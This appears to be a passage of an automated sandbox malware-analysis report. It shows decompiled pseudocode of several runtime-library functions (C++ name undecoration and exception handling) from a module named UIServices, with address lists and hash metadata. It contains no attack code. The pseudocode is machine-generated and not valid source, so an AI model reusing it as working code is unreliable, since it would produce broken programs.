                                                    				_t132 =  *0x23574360; // 0x0
                                                    				if ( *_t132 == 0x40) goto 0x23569ad4;
                                                    				E00007FFC7FFC2356BC80(_t95, _t139,  &_v88, _t163, _t164, _t175, _t176, _t178);
                                                    				_v104 =  *_t132;
                                                    				_v96 =  *(_t132 + 8);
                                                    				_v88 = "::";
                                                    				_v80 = 2;
                                                    				asm("movaps xmm0, [ebp-0x40]");
                                                    				asm("movdqa [ebp-0x40], xmm0");
                                                    				E00007FFC7FFC23566F48( &_v104,  &_v72,  &_v88);
                                                    				goto 0x23569abb;
                                                    				_t134 = "::";
                                                    				_v88 = _t134;
                                                    				_v80 = 2;
                                                    				asm("movaps xmm0, [ebp-0x40]");
                                                    				asm("movdqa [ebp-0x40], xmm0");
                                                    				E00007FFC7FFC23566F48( &_v104,  &_v56,  &_v88);
                                                    				E00007FFC7FFC23566F74(_t134,  &_v72,  &_v120);
                                                    				_t98 =  *(_t134 + 8);
                                                    				_t182 =  *_t134;
                                                    				_v112 = _t98;
                                                    				_v120 = _t182;
                                                    				if (r12d == 0) goto 0x23569ae5;
                                                    				if (_t182 == 0) goto 0x23569ae5;
                                                    				asm("bts esi, 0x9");
                                                    				_v112 = _t98;
                                                    				if (r15d == 0) goto 0x23569af4;
                                                    				_t99 = _t98 | 0x00008000;
                                                    				_v112 = _t99;
                                                    				if (_t182 == 0) goto 0x235699d6;
                                                    				if ((0x00001000 & _t99) != 0) goto 0x235699d6;
                                                    				_t135 =  *0x23574360; // 0x0
                                                    				if ( *_t135 == 0) goto 0x23569b30;
                                                    				if ( *_t135 == 0x40) goto 0x23569b29;
                                                    				_t139[1] = _t139[1] & 0x00000000;
                                                    				_t139[1] = 2;
                                                    				 *_t139 =  *_t139 & 0x00000000;
                                                    				goto 0x23569b86;
                                                    				 *0x23574360 =  *0x23574360 + 1;
                                                    				if (( *0x23574370 & 0x00001000) == 0) goto 0x23569b5c;
                                                    				if (r12d != 0) goto 0x23569b5c;
                                                    				if ((0x00008000 & _t99) != 0) goto 0x23569b5c;
                                                    				_v88 = _v88 & 0x00000000;
                                                    				_v80 = _v80 & r12d;
                                                    				E00007FFC7FFC235672A8(_t139,  &_v56,  &_v88);
                                                    				goto 0x235699d6;
                                                    				_t85 = E00007FFC7FFC235672A8(_t139, _t139,  &_v120);
                                                    				goto 0x23569b86;
                                                    				 *_t139 =  *_t139 & 0x00000000;
                                                    				_t139[1] = _t139[1] & 0x00000000;
                                                    				if (0x8000 == 0) goto 0x23569b7c;
                                                    				_t139[1] = 2;
                                                    				goto 0x23569b86;
                                                    				 *_t139 = 0x23571ac0;
                                                    				 *0x23574384 =  *0x23574384 - 1;
                                                    				return _t85;
                                                    			}
































                                                    0x7ffc235698c8
                                                    0x7ffc235698c8
                                                    0x7ffc235698c8
                                                    0x7ffc235698c8
                                                    0x7ffc235698c8
                                                    0x7ffc235698c8
                                                    0x7ffc235698c8
                                                    0x7ffc235698cd
                                                    0x7ffc235698d2
                                                    0x7ffc235698e6
                                                    0x7ffc235698e9
                                                    0x7ffc235698ef
                                                    0x7ffc235698f5
                                                    0x7ffc235698f9
                                                    0x7ffc235698fb
                                                    0x7ffc235698ff
                                                    0x7ffc2356990b
                                                    0x7ffc23569910
                                                    0x7ffc2356991c
                                                    0x7ffc23569922
                                                    0x7ffc23569925
                                                    0x7ffc2356992a
                                                    0x7ffc23569937
                                                    0x7ffc2356993d
                                                    0x7ffc23569940
                                                    0x7ffc23569949
                                                    0x7ffc23569950
                                                    0x7ffc23569956
                                                    0x7ffc2356995b
                                                    0x7ffc23569962
                                                    0x7ffc23569964
                                                    0x7ffc23569967
                                                    0x7ffc23569971
                                                    0x7ffc23569973
                                                    0x7ffc2356997c
                                                    0x7ffc23569980
                                                    0x7ffc23569985
                                                    0x7ffc23569987
                                                    0x7ffc2356998e
                                                    0x7ffc23569993
                                                    0x7ffc23569998
                                                    0x7ffc2356999a
                                                    0x7ffc235699a3
                                                    0x7ffc235699a8
                                                    0x7ffc235699ab
                                                    0x7ffc235699af
                                                    0x7ffc235699b2
                                                    0x7ffc235699b4
                                                    0x7ffc235699b8
                                                    0x7ffc235699ba
                                                    0x7ffc235699c0
                                                    0x7ffc235699c2
                                                    0x7ffc235699c5
                                                    0x7ffc235699c8
                                                    0x7ffc235699cc
                                                    0x7ffc235699d4
                                                    0x7ffc235699d6
                                                    0x7ffc235699d9
                                                    0x7ffc235699dc
                                                    0x7ffc235699e1
                                                    0x7ffc235699eb
                                                    0x7ffc235699f5
                                                    0x7ffc235699ff
                                                    0x7ffc23569a0c
                                                    0x7ffc23569a0e
                                                    0x7ffc23569a21
                                                    0x7ffc23569a29
                                                    0x7ffc23569a30
                                                    0x7ffc23569a33
                                                    0x7ffc23569a3d
                                                    0x7ffc23569a47
                                                    0x7ffc23569a4f
                                                    0x7ffc23569a56
                                                    0x7ffc23569a60
                                                    0x7ffc23569a64
                                                    0x7ffc23569a6b
                                                    0x7ffc23569a6f
                                                    0x7ffc23569a80
                                                    0x7ffc23569a89
                                                    0x7ffc23569a8b
                                                    0x7ffc23569a92
                                                    0x7ffc23569a96
                                                    0x7ffc23569a9d
                                                    0x7ffc23569aa1
                                                    0x7ffc23569ab2
                                                    0x7ffc23569ac2
                                                    0x7ffc23569ac7
                                                    0x7ffc23569aca
                                                    0x7ffc23569acd
                                                    0x7ffc23569ad0
                                                    0x7ffc23569ad7
                                                    0x7ffc23569adc
                                                    0x7ffc23569ade
                                                    0x7ffc23569ae2
                                                    0x7ffc23569aed
                                                    0x7ffc23569aef
                                                    0x7ffc23569af1
                                                    0x7ffc23569af7
                                                    0x7ffc23569b04
                                                    0x7ffc23569b0a
                                                    0x7ffc23569b14
                                                    0x7ffc23569b19
                                                    0x7ffc23569b1b
                                                    0x7ffc23569b1f
                                                    0x7ffc23569b23
                                                    0x7ffc23569b27
                                                    0x7ffc23569b29
                                                    0x7ffc23569b36
                                                    0x7ffc23569b3b
                                                    0x7ffc23569b3f
                                                    0x7ffc23569b41
                                                    0x7ffc23569b46
                                                    0x7ffc23569b52
                                                    0x7ffc23569b57
                                                    0x7ffc23569b63
                                                    0x7ffc23569b68
                                                    0x7ffc23569b6a
                                                    0x7ffc23569b6e
                                                    0x7ffc23569b74
                                                    0x7ffc23569b76
                                                    0x7ffc23569b7a
                                                    0x7ffc23569b83
                                                    0x7ffc23569b86
                                                    0x7ffc23569bab

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID:
                                                    • API String ID: 2943138195-0
                                                    • Opcode ID: 617483df2bc71fa7b9fd296a9a341e4663d5cd8a72fcbc277ec82a6390d51f17
                                                    • Instruction ID: dd0242738f060bc465be82ea006506e1bcd52e6f1017e6d68b0971e3fa605ec0
                                                    • Opcode Fuzzy Hash: 617483df2bc71fa7b9fd296a9a341e4663d5cd8a72fcbc277ec82a6390d51f17
                                                    • Instruction Fuzzy Hash: A1915862F08A6A89FB15CB60DC443AC37B1FB44748F5440B5DE4D3B699DF78A885CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 84%
                                                    			E00007FFC7FFC2356A04C(void* __eflags, long long __rbx, signed long long* __rcx, void* __rdx, long long __rdi, char* __r8, void* __r10, long long _a8, long long _a16) {
                                                    				char _v24;
                                                    				char _v40;
                                                    				signed int _v48;
                                                    				signed int _v56;
                                                    				char _t41;
                                                    				void* _t50;
                                                    				intOrPtr* _t76;
                                                    				char* _t77;
                                                    				intOrPtr* _t78;
                                                    				char* _t79;
                                                    				signed long long* _t86;
                                                    				long long _t89;
                                                    				char* _t90;
                                                    				signed long long _t98;
                                                    				long long _t104;
                                                    				signed long long _t118;
                                                    				char* _t120;
                                                    
                                                    				_a8 = __rbx;
                                                    				_a16 = __rdi;
                                                    				_v56 = _v56 & 0x00000000;
                                                    				_t86 = __rcx;
                                                    				_t89 =  *0x23574360; // 0x0
                                                    				_t120 = __r8;
                                                    				_v48 = _v48 & 0x00000000;
                                                    				_t90 = _t89 + 1;
                                                    				 *0x23574360 = _t90;
                                                    				r10d =  *_t90;
                                                    				r8d = r10d;
                                                    				r8d = r8d - 0x41;
                                                    				if (__eflags == 0) goto 0x2356a201;
                                                    				r8d = r8d - 1;
                                                    				if (__eflags == 0) goto 0x2356a1d3;
                                                    				if (r8d == 1) goto 0x2356a1cb;
                                                    				if ( *_t90 == 0) goto 0x2356a1bf;
                                                    				_t41 =  *((char*)(_t90 + 1));
                                                    				if (_t41 == 0) goto 0x2356a1bf;
                                                    				if (r9d != 0) goto 0x2356a1d8;
                                                    				r10d = r10d << 4;
                                                    				_t8 = _t90 + 2; // 0x3
                                                    				_t76 = _t8;
                                                    				 *0x23574360 = _t76;
                                                    				if (_t41 + 0xfffffcd0 + r10d - 1 <= 0) goto 0x2356a113;
                                                    				E00007FFC7FFC23566E4C(E00007FFC7FFC23568150(0x2c, _t76, __rcx,  &_v56),  &_v40, __rdx, __r10);
                                                    				E00007FFC7FFC23566F74( &_v56,  &_v24, _t76);
                                                    				_v56 =  *_t76;
                                                    				_v48 =  *((intOrPtr*)(_t76 + 8));
                                                    				r8b = 0x3e;
                                                    				E00007FFC7FFC23566FA0( &_v56,  &_v24);
                                                    				_t77 =  *0x23574360; // 0x0
                                                    				_v56 =  *_t76;
                                                    				_v48 =  *((intOrPtr*)(_t76 + 8));
                                                    				if ( *_t77 != 0x24) goto 0x2356a148;
                                                    				_t78 = _t77 + 1;
                                                    				 *0x23574360 = _t78;
                                                    				goto 0x2356a16c;
                                                    				r8b = 0x5e;
                                                    				E00007FFC7FFC23566FA0( &_v56,  &_v24);
                                                    				_t98 =  *_t78;
                                                    				_t79 =  *0x23574360; // 0x0
                                                    				_v56 = _t98;
                                                    				_v48 =  *((intOrPtr*)(_t78 + 8));
                                                    				_t118 = _t98;
                                                    				if ( *_t79 == 0) goto 0x2356a180;
                                                    				 *0x23574360 = _t79 + 1;
                                                    				goto 0x2356a1b0;
                                                    				if (_v48 - 1 > 0) goto 0x2356a1b0;
                                                    				if (_t118 == 0) goto 0x2356a1a4;
                                                    				E00007FFC7FFC23566AA0(_t79 + 1, _t86,  &_v56, 0x23571ac0);
                                                    				goto 0x2356a1b0;
                                                    				asm("bts edx, 0xe");
                                                    				 *_t86 = 0x23571ac0;
                                                    				_t86[1] = 1;
                                                    				goto 0x2356a240;
                                                    				 *_t86 = 0x23571ac0;
                                                    				goto 0x2356a23c;
                                                    				 *0x23571ac0 = 5;
                                                    				goto 0x2356a1f5;
                                                    				if (r9d == 0) goto 0x2356a1e6;
                                                    				_t86[1] = _t86[1] & 0x00000000;
                                                    				 *_t86 =  *_t86 & 0x00000000;
                                                    				_t86[1] = 2;
                                                    				goto 0x2356a240;
                                                    				 *_t120 = 1;
                                                    				E00007FFC7FFC23568150(0x3e, _t79 + 1, _t86,  &_v56);
                                                    				goto 0x2356a231;
                                                    				if (r9d != 0) goto 0x2356a22d;
                                                    				r8d =  *0x23571ac0;
                                                    				_t35 = _t118 - 2; // -67
                                                    				_t50 = _t35;
                                                    				if (_t50 - 1 <= 0) goto 0x2356a220;
                                                    				if (r8d != 1) goto 0x2356a22d;
                                                    				 *0x23571ac0 = 4;
                                                    				goto 0x2356a226;
                                                    				 *0x23571ac0 = 5;
                                                    				_t104 =  *0x23574360; // 0x0
                                                    				_t36 = _t104 + 1; // 0x1
                                                    				 *_t86 =  *_t86 & 0x00000000;
                                                    				 *0x23574360 = _t36;
                                                    				_t86[1] = _t86[1] & 0x00000000;
                                                    				return _t50;
                                                    			}




















                                                    0x7ffc2356a04c
                                                    0x7ffc2356a051
                                                    0x7ffc2356a05e
                                                    0x7ffc2356a063
                                                    0x7ffc2356a066
                                                    0x7ffc2356a06d
                                                    0x7ffc2356a070
                                                    0x7ffc2356a074
                                                    0x7ffc2356a077
                                                    0x7ffc2356a07e
                                                    0x7ffc2356a082
                                                    0x7ffc2356a085
                                                    0x7ffc2356a089
                                                    0x7ffc2356a08f
                                                    0x7ffc2356a093
                                                    0x7ffc2356a09d
                                                    0x7ffc2356a0a6
                                                    0x7ffc2356a0ac
                                                    0x7ffc2356a0b2
                                                    0x7ffc2356a0bb
                                                    0x7ffc2356a0c3
                                                    0x7ffc2356a0cd
                                                    0x7ffc2356a0cd
                                                    0x7ffc2356a0d4
                                                    0x7ffc2356a0de
                                                    0x7ffc2356a0f1
                                                    0x7ffc2356a101
                                                    0x7ffc2356a10c
                                                    0x7ffc2356a110
                                                    0x7ffc2356a113
                                                    0x7ffc2356a11e
                                                    0x7ffc2356a129
                                                    0x7ffc2356a130
                                                    0x7ffc2356a134
                                                    0x7ffc2356a13a
                                                    0x7ffc2356a13c
                                                    0x7ffc2356a13f
                                                    0x7ffc2356a146
                                                    0x7ffc2356a148
                                                    0x7ffc2356a153
                                                    0x7ffc2356a158
                                                    0x7ffc2356a15e
                                                    0x7ffc2356a165
                                                    0x7ffc2356a169
                                                    0x7ffc2356a16f
                                                    0x7ffc2356a172
                                                    0x7ffc2356a177
                                                    0x7ffc2356a17e
                                                    0x7ffc2356a184
                                                    0x7ffc2356a189
                                                    0x7ffc2356a196
                                                    0x7ffc2356a1a2
                                                    0x7ffc2356a1b0
                                                    0x7ffc2356a1b4
                                                    0x7ffc2356a1b7
                                                    0x7ffc2356a1ba
                                                    0x7ffc2356a1c6
                                                    0x7ffc2356a1c9
                                                    0x7ffc2356a1cb
                                                    0x7ffc2356a1d1
                                                    0x7ffc2356a1d6
                                                    0x7ffc2356a1d8
                                                    0x7ffc2356a1dc
                                                    0x7ffc2356a1e0
                                                    0x7ffc2356a1e4
                                                    0x7ffc2356a1e8
                                                    0x7ffc2356a1f0
                                                    0x7ffc2356a1ff
                                                    0x7ffc2356a204
                                                    0x7ffc2356a206
                                                    0x7ffc2356a209
                                                    0x7ffc2356a209
                                                    0x7ffc2356a210
                                                    0x7ffc2356a216
                                                    0x7ffc2356a218
                                                    0x7ffc2356a21e
                                                    0x7ffc2356a220
                                                    0x7ffc2356a226
                                                    0x7ffc2356a22d
                                                    0x7ffc2356a231
                                                    0x7ffc2356a235
                                                    0x7ffc2356a23c
                                                    0x7ffc2356a252

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+$NameName::
                                                    • String ID:
                                                    • API String ID: 168861036-0
                                                    • Opcode ID: 5f043ee59f9ebb7bd0428048c60ae5a03d170c8436db0794779eb3a5a89de9d1
                                                    • Instruction ID: d24586e7d80b38af991aa5dce7f4f25358a2e46baebf51e069fda5149ea13cf3
                                                    • Opcode Fuzzy Hash: 5f043ee59f9ebb7bd0428048c60ae5a03d170c8436db0794779eb3a5a89de9d1
                                                    • Instruction Fuzzy Hash: 485118B2F186AA89E710CF60EC407B837A0FB84748F548071EA0E67695DF39A481CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 91%
                                                    			E00007FFC7FFC2356C134(signed int __ecx, void* __edi, intOrPtr* __rax, long long __rbx, signed long long* __rcx, void* __rdx, void* __rdi, void* __rsi, void* __r8, void* __r10, void* __r11, void* __r12, long long __r14, long long _a8, long long _a16) {
                                                    				char _v24;
                                                    				char _v40;
                                                    				char _v56;
                                                    				signed int _v64;
                                                    				char _v72;
                                                    				signed int _t36;
                                                    				signed int _t43;
                                                    				void* _t44;
                                                    				signed int _t45;
                                                    				intOrPtr* _t55;
                                                    				intOrPtr* _t56;
                                                    				char* _t57;
                                                    				char* _t58;
                                                    				signed long long* _t62;
                                                    				signed long long _t70;
                                                    				long long _t94;
                                                    
                                                    				_t80 = __rsi;
                                                    				_t79 = __rdi;
                                                    				_t55 = __rax;
                                                    				_t45 = __ecx;
                                                    				_a8 = __rbx;
                                                    				_a16 = __r14;
                                                    				 *__rcx =  *__rcx & 0x00000000;
                                                    				_t62 = __rcx;
                                                    				__rcx[1] = __rcx[1] & 0x00000000;
                                                    				r8d = 0;
                                                    				E00007FFC7FFC2356DA5C(_t44, __ecx, 1, __edi, __rcx,  &_v56, __rdi, __rsi, __r8, __r10, __r11);
                                                    				_t94 = "::";
                                                    				 *__rcx =  *_t55;
                                                    				_t36 =  *(_t55 + 8);
                                                    				__rcx[1] = _t36;
                                                    				_t56 =  *0x23574360; // 0x0
                                                    				if (_t36 != 0) goto 0x2356c1d6;
                                                    				if ( *_t56 == 0) goto 0x2356c1d6;
                                                    				if ( *_t56 == 0x40) goto 0x2356c1db;
                                                    				_v72 = _t94;
                                                    				_v64 = 2;
                                                    				asm("movaps xmm0, [ebp-0x40]");
                                                    				asm("movdqa [ebp-0x40], xmm0");
                                                    				E00007FFC7FFC2356BC80(__edi, __rcx,  &_v56, _t79, _t80, __r10, __r11, __r12);
                                                    				E00007FFC7FFC23566F48(_t56,  &_v40,  &_v72);
                                                    				E00007FFC7FFC23566F74(_t56,  &_v24, _t62);
                                                    				_t70 =  *_t56;
                                                    				 *_t62 = _t70;
                                                    				_t62[1] =  *(_t56 + 8);
                                                    				_t57 =  *0x23574360; // 0x0
                                                    				if ( *_t57 != 0x40) goto 0x2356c1e7;
                                                    				_t58 = _t57 + 1;
                                                    				 *0x23574360 = _t58;
                                                    				goto 0x2356c25a;
                                                    				if ( *_t58 == 0) goto 0x2356c1fa;
                                                    				_t62[1] = _t62[1] & 0x00000000;
                                                    				 *_t62 =  *_t62 & 0x00000000;
                                                    				_t62[1] = 2;
                                                    				goto 0x2356c25a;
                                                    				if (_t70 != 0) goto 0x2356c212;
                                                    				_t62[1] = _t62[1] & _t45;
                                                    				_t62[1] = 1;
                                                    				 *_t62 = 0x23571ac0;
                                                    				goto 0x2356c25a;
                                                    				_v72 = _t94;
                                                    				_v64 = 2;
                                                    				asm("movaps xmm0, [ebp-0x40]");
                                                    				_v64 = _v64 & 0x00000000;
                                                    				asm("movdqa [ebp-0x30], xmm0");
                                                    				_v72 = 0x23571ac0;
                                                    				E00007FFC7FFC23566F48( &_v72,  &_v24,  &_v56);
                                                    				E00007FFC7FFC23566F74(0x23571ac0,  &_v40, _t62);
                                                    				 *_t62 =  *0x23571ac0;
                                                    				_t43 =  *0x7FFC23571AC8;
                                                    				_t62[1] = _t43;
                                                    				return _t43;
                                                    			}



















                                                    0x7ffc2356c134
                                                    0x7ffc2356c134
                                                    0x7ffc2356c134
                                                    0x7ffc2356c134
                                                    0x7ffc2356c134
                                                    0x7ffc2356c139
                                                    0x7ffc2356c146
                                                    0x7ffc2356c14a
                                                    0x7ffc2356c14d
                                                    0x7ffc2356c151
                                                    0x7ffc2356c15a
                                                    0x7ffc2356c15f
                                                    0x7ffc2356c169
                                                    0x7ffc2356c16c
                                                    0x7ffc2356c171
                                                    0x7ffc2356c174
                                                    0x7ffc2356c17b
                                                    0x7ffc2356c180
                                                    0x7ffc2356c185
                                                    0x7ffc2356c187
                                                    0x7ffc2356c18f
                                                    0x7ffc2356c196
                                                    0x7ffc2356c19a
                                                    0x7ffc2356c19f
                                                    0x7ffc2356c1af
                                                    0x7ffc2356c1be
                                                    0x7ffc2356c1c3
                                                    0x7ffc2356c1c6
                                                    0x7ffc2356c1cc
                                                    0x7ffc2356c1cf
                                                    0x7ffc2356c1d9
                                                    0x7ffc2356c1db
                                                    0x7ffc2356c1de
                                                    0x7ffc2356c1e5
                                                    0x7ffc2356c1ea
                                                    0x7ffc2356c1ec
                                                    0x7ffc2356c1f0
                                                    0x7ffc2356c1f4
                                                    0x7ffc2356c1f8
                                                    0x7ffc2356c204
                                                    0x7ffc2356c206
                                                    0x7ffc2356c209
                                                    0x7ffc2356c20d
                                                    0x7ffc2356c210
                                                    0x7ffc2356c212
                                                    0x7ffc2356c21a
                                                    0x7ffc2356c225
                                                    0x7ffc2356c22d
                                                    0x7ffc2356c231
                                                    0x7ffc2356c236
                                                    0x7ffc2356c23a
                                                    0x7ffc2356c249
                                                    0x7ffc2356c251
                                                    0x7ffc2356c254
                                                    0x7ffc2356c257
                                                    0x7ffc2356c26c

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID:
                                                    • API String ID: 2943138195-0
                                                    • Opcode ID: c43750c4fa97d1e8d572e3b02b60efc17716b65408e7882041c43f40baf96658
                                                    • Instruction ID: 002e09506f90c867f6d35271fba0626ac7e310d352840b16751630d0734f0c15
                                                    • Opcode Fuzzy Hash: c43750c4fa97d1e8d572e3b02b60efc17716b65408e7882041c43f40baf96658
                                                    • Instruction Fuzzy Hash: 5E415672E08BA9C9EB01CF64E8453AC77B0FB48B48F548075EA4E67759DF389481CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 64%
                                                    			E00007FFC7FFC235644B0(void* __ecx, void* __rcx, intOrPtr _a8, intOrPtr _a16, signed int _a24, void* _a32) {
                                                    				char _v80;
                                                    				signed long long _v96;
                                                    				long long _v104;
                                                    				long long _v136;
                                                    				signed long long _v144;
                                                    				signed int _v152;
                                                    				long long _v160;
                                                    				long long _v168;
                                                    				signed long long _v176;
                                                    				signed int _v184;
                                                    				void* __rbx;
                                                    				void* _t105;
                                                    				void* _t124;
                                                    				long long _t125;
                                                    				signed long long _t129;
                                                    				signed int _t130;
                                                    				long long _t132;
                                                    				signed long long _t134;
                                                    				long long _t153;
                                                    				intOrPtr* _t154;
                                                    				void* _t155;
                                                    				signed long long _t160;
                                                    
                                                    				_t124 = _t155;
                                                    				r12d = 0;
                                                    				_v184 = r12d;
                                                    				_a24 = _a24 & r12d;
                                                    				_v176 = _v176 & _t160;
                                                    				_v152 = _v152 & _t160;
                                                    				 *((intOrPtr*)(_t124 - 0x80)) = r12b;
                                                    				 *(_t124 - 0x7c) =  *(_t124 - 0x7c) & r12d;
                                                    				 *(_t124 - 0x78) =  *(_t124 - 0x78) & r12d;
                                                    				 *(_t124 - 0x74) =  *(_t124 - 0x74) & r12d;
                                                    				 *(_t124 - 0x70) =  *(_t124 - 0x70) & r12d;
                                                    				 *(_t124 - 0x6c) =  *(_t124 - 0x6c) & r12d;
                                                    				E00007FFC7FFC235664B0(_t124);
                                                    				_t125 =  *((intOrPtr*)(_t124 + 0x28));
                                                    				_v160 = _t125;
                                                    				E00007FFC7FFC235664B0(_t125);
                                                    				_v168 =  *((intOrPtr*)(_t125 + 0x20));
                                                    				_t153 =  *((intOrPtr*)(__rcx + 0x50));
                                                    				_a32 = _t153;
                                                    				_t132 =  *((intOrPtr*)(__rcx + 0x40));
                                                    				_v136 =  *((intOrPtr*)(__rcx + 0x30));
                                                    				_v104 =  *((intOrPtr*)(__rcx + 0x48));
                                                    				_t129 =  *((intOrPtr*)(__rcx + 0x68));
                                                    				_v96 = _t129;
                                                    				_a16 =  *((intOrPtr*)(__rcx + 0x78));
                                                    				_a8 =  *((intOrPtr*)(__rcx + 0x38));
                                                    				E00007FFC7FFC23561894( *((intOrPtr*)(__rcx + 0x38)), _t132);
                                                    				E00007FFC7FFC235664B0(_t129);
                                                    				 *((long long*)(_t129 + 0x20)) = _t153;
                                                    				E00007FFC7FFC235664B0(_t129);
                                                    				 *((long long*)(_t129 + 0x28)) = _t132;
                                                    				E00007FFC7FFC235664B0(_t129);
                                                    				E00007FFC7FFC2356EFB0(_t129,  &_v80,  *((intOrPtr*)( *((intOrPtr*)(_t129 + 0x20)) + 0x28)));
                                                    				_v144 = _t129;
                                                    				if ( *((intOrPtr*)(__rcx + 0x58)) == _t160) goto 0x235645b2;
                                                    				_a24 = 1;
                                                    				E00007FFC7FFC235664B0(_t129);
                                                    				_v152 =  *((intOrPtr*)(_t129 + 0x70));
                                                    				r8d = 0x100;
                                                    				E00007FFC7FFC23561060(_v136,  *((intOrPtr*)(__rcx + 0x28)));
                                                    				_v176 = _t129;
                                                    				if (_t129 - 2 >= 0) goto 0x235645ea;
                                                    				_t134 =  *((intOrPtr*)(_t155 - 0xa8 + 0x70 + _t129 * 8));
                                                    				if (_t134 == 0) goto 0x235645e4;
                                                    				_v176 = _t134;
                                                    				goto 0x235645ea;
                                                    				abort();
                                                    				E00007FFC7FFC23561090(_t134,  *((intOrPtr*)(__rcx + 0x28)));
                                                    				_v184 = 1;
                                                    				E00007FFC7FFC235664B0(_t129);
                                                    				 *(_t129 + 0x40) =  *(_t129 + 0x40) & 0x00000000;
                                                    				E00007FFC7FFC235664B0(_t129);
                                                    				 *((intOrPtr*)(_t129 + 0x78)) = _a16;
                                                    				_t154 = _a32;
                                                    				if (_a24 == 0) goto 0x23564651;
                                                    				E00007FFC7FFC23562070(1, _t154);
                                                    				_t130 = _v152;
                                                    				r8d =  *((intOrPtr*)(_t130 + 0x18));
                                                    				goto 0x2356465e;
                                                    				r8d =  *((intOrPtr*)(_t154 + 0x18));
                                                    				RaiseException(??, ??, ??, ??);
                                                    				r12d = _v184;
                                                    				E00007FFC7FFC2356EFF0(_t130, _v176, _v144);
                                                    				if (r12d != 0) goto 0x235646bc;
                                                    				if ( *_t154 != 0xe06d7363) goto 0x235646bc;
                                                    				if ( *((intOrPtr*)(_t154 + 0x18)) != 4) goto 0x235646bc;
                                                    				if ( *((intOrPtr*)(_t154 + 0x20)) - 0x19930520 - 2 > 0) goto 0x235646bc;
                                                    				if (E00007FFC7FFC235620F0(_t130,  *((intOrPtr*)(_t154 + 0x28))) == 0) goto 0x235646bc;
                                                    				E00007FFC7FFC23562070(1, _t154);
                                                    				E00007FFC7FFC235664B0(_t130);
                                                    				 *((long long*)(_t130 + 0x20)) = _v168;
                                                    				E00007FFC7FFC235664B0(_t130);
                                                    				 *((long long*)(_t130 + 0x28)) = _v160;
                                                    				E00007FFC7FFC235664B0(_t130);
                                                    				 *((intOrPtr*)(_t130 + 0x78)) = _a8;
                                                    				_t105 = E00007FFC7FFC235664B0(_t130);
                                                    				 *((intOrPtr*)(_t130 + 0x78)) = 0xfffffffe;
                                                    				return _t105;
                                                    			}

























                                                    0x7ffc235644b0
                                                    0x7ffc235644c6
                                                    0x7ffc235644c9
                                                    0x7ffc235644ce
                                                    0x7ffc235644d6
                                                    0x7ffc235644db
                                                    0x7ffc235644e0
                                                    0x7ffc235644e4
                                                    0x7ffc235644e8
                                                    0x7ffc235644ec
                                                    0x7ffc235644f0
                                                    0x7ffc235644f4
                                                    0x7ffc235644f8
                                                    0x7ffc235644fd
                                                    0x7ffc23564501
                                                    0x7ffc23564506
                                                    0x7ffc2356450f
                                                    0x7ffc23564514
                                                    0x7ffc23564518
                                                    0x7ffc23564520
                                                    0x7ffc23564528
                                                    0x7ffc23564535
                                                    0x7ffc2356453a
                                                    0x7ffc2356453e
                                                    0x7ffc23564546
                                                    0x7ffc23564550
                                                    0x7ffc2356455a
                                                    0x7ffc2356455f
                                                    0x7ffc23564564
                                                    0x7ffc23564568
                                                    0x7ffc2356456d
                                                    0x7ffc23564571
                                                    0x7ffc23564586
                                                    0x7ffc2356458e
                                                    0x7ffc23564597
                                                    0x7ffc23564599
                                                    0x7ffc235645a4
                                                    0x7ffc235645ad
                                                    0x7ffc235645b2
                                                    0x7ffc235645c0
                                                    0x7ffc235645c8
                                                    0x7ffc235645d1
                                                    0x7ffc235645d3
                                                    0x7ffc235645db
                                                    0x7ffc235645dd
                                                    0x7ffc235645e2
                                                    0x7ffc235645e4
                                                    0x7ffc235645f0
                                                    0x7ffc23564601
